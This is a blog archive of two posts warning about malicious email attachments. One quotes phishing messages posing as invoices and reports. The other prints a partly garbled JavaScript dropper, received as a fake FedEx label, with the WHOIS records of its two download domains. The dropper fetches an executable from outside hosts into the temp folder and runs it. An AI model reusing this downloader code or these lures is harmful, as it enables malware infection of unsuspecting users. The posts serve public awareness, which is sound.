Tag Archives: attachments

A dozen Crypto attempts today

Posted on by The Old Wolf

crypto

All of these arrived in my inbox today; many are duplicated versions of the same message with minor changes.

Dear info,
Cathleen Holcomb asked me to send you the attached Word document, which contains the final version of the report.
Please let me know if you have any trouble with the file, and please let Cathleen know if you have any questions about the contents of the report.
Kind regards
Alisa Harper
Managing Director
Notice that all of these emails begin with “Dear Info,” since the relevant address is “info@devnull.com.” This in itself should be a red flag.
Dear info:
Thank you for your email regarding your order of 21 June, and sorry for the delay in replying. I am writing to confirm receipt of your order, and to inform you that the item you requested will be delivered by 25 June at the latest. If you require more information regarding this order, please do not hesitate to contact me.
Also, our records show that we have not yet received payment for the previous order of 11 June, so I would be grateful if you could send payment as soon as possible. Please find attached the corresponding invoice.
If there is anything else you require, our company would be pleased to help. Looking forward to hearing from you soon.
Yours sincerely
Benjamin Martin
Chief Executive Officer
Information. A report. An invoice with request for payment. A spreadsheet. All looking innocuous and legitimate.
Dear info,
The reference you requested is attached.
Let me know if you have any questions.
Best regards
Erma Frederick
CEO
No matter how official emails like this look, you should verify every detail before proceeding.
Dear info,
Our records show that we have not yet received payment for the previous order #A-393685
Could you please send payment as soon as possible?
Please find attached file for details.
Yours sincerely
Jami Garrett
Mexico Key Account Director
Don’t open those attachments! They are almost certainly javascript files which will download an encryption virus or something equally vicious.
Be careful out there.
The Old Wolf has spoken.

Another package of Javascript malware

Posted on by The Old Wolf

mon

I wish I were a javascript programmer.

Here’s the code that came to me via email in a .zip file, under the malicious guise of a FedEx delivery label (it was packaged to look like the code you see in my previous post.)

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function cwm() { return ‘e’; };

function xn() { return ‘val’; };

function dl(fr) { var b = “dickinsonwrestlingclub.com etqy.com soflectplit(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er)) { return ‘.c {}; if (dn == 1) break; } }; dl(7) { return ‘om”.s971); dl(6202’; };  var xv = ”; ); dl(613);

for (var rlh=1; rlh<=225; rlh++) { xv += this[‘xn’+rlh](); } this[cwm()+xn()](xv);

The email:

To: info@academyofgreatness.com
Subject: Problems with item delivery, n.00000732560

From: “FedEx International MailService” <seth.mcdowell@77.241.83.157.static.hosted.by.combell.com>

Dear Customer,

We could not deliver your item.
Please, download Delivery Label attached to this email.
Yours faithfully,
Seth Mcdowell,
Operation Manager.
FedEx_ID_00000732560.zip
 I have said before and will say cheerfully again, Don’t Open Attachments from People You Don’t Know. Just don’t. Files labelled .zip, .exe, .js, or even .doc, .pdf, and others can be malicious. Sadly, too many people suppress the display of file extensions on their machine, because that’s the default Microsoft has herded people into, and it’s dangerous.
The script above goes out to two websites, “dickinsonwrestlingclub.com” which redirects to a Facebook page, and etqy.com. The registration of the first hides behind a privacy wall:
Domain Name: DICKINSONWRESTLINGCLUB.COM
Registry Domain ID: 336832356_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2015-01-29T00:13:33Z
Creation Date: 2006-02-06T15:11:04Z
Registrar Registration Expiration Date: 2017-02-06T05:00:00Z
Registrar: NETWORK SOLUTIONS, LLC.
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 12808 Gran Bay Parkway West
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32258
Registrant Country: US
Registrant Phone: +1.5707088780
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: h72bn4775k5@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 12808 Gran Bay Parkway West
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32258
Admin Country: US
Admin Phone: +1.5707088780
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: h72bn4775k5@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 12808 Gran Bay Parkway West
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32258
Tech Country: US
Tech Phone: +1.5707088780
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: h72bn4775k5@networksolutionsprivateregistration.com
Name Server: NS1.CTCTEL.COM
Name Server: NS2.CTCTEL.COM
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
The second is registered to someone in Turkey:
Domain Name: etqy.com
Registry Domain ID: 1527531270_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.srsplus.com
Registrar URL: http://srsplus.com
Updated Date: 2014-03-13T20:56:39Z
Creation Date: 2008-11-07T19:15:39Z
Registrar Registration Expiration Date: 2015-11-07T19:15:39Z
Registrar: TLDS LLC. d/b/a SRSPlus
Registrar IANA ID: 320
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8773812449
Reseller:
Domain Status: clientTransferProhibited http://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Ferhat Yilmaz
Registrant Organization:
Registrant Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Registrant City: Istanbul
Registrant State/Province: none
Registrant Postal Code: 34724
Registrant Country: TR
Registrant Phone: +90.90211
Registrant Phone Ext.:
Registrant Fax:
Registrant Fax Ext.:
Registrant Email: info@etqy.com
Registry Admin ID:
Admin Name: Ferhat Yilmaz
Admin Organization:
Admin Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Admin City: Istanbul
Admin State/Province: none
Admin Postal Code: 34724
Admin Country: TR
Admin Phone: +90.90211
Admin Phone Ext.:
Admin Fax:
Admin Fax Ext.:
Admin Email: info@etqy.com
Registry Tech ID:
Tech Name: Ferhat Yilmaz
Tech Organization:
Tech Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Tech City: Istanbul
Tech State/Province: none
Tech Postal Code: 34724
Tech Country: TR
Tech Phone: +90.90211
Tech Phone Ext.:
Tech Fax:
Tech Fax Ext.:
Tech Email: info@etqy.com
Name Server: ns51.1and1.com
Name Server: ns52.1and1.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

The code goes out to these websites and downloads other files, and then runs them. What will happen to your computer next is anyone’s guess. That’s why I wish I knew javascript better, so I could determine exactly what was being downloaded and what it is supposed to do.

Whatever the case, stay away from attachments in your email.

The Old Wolf has spoken.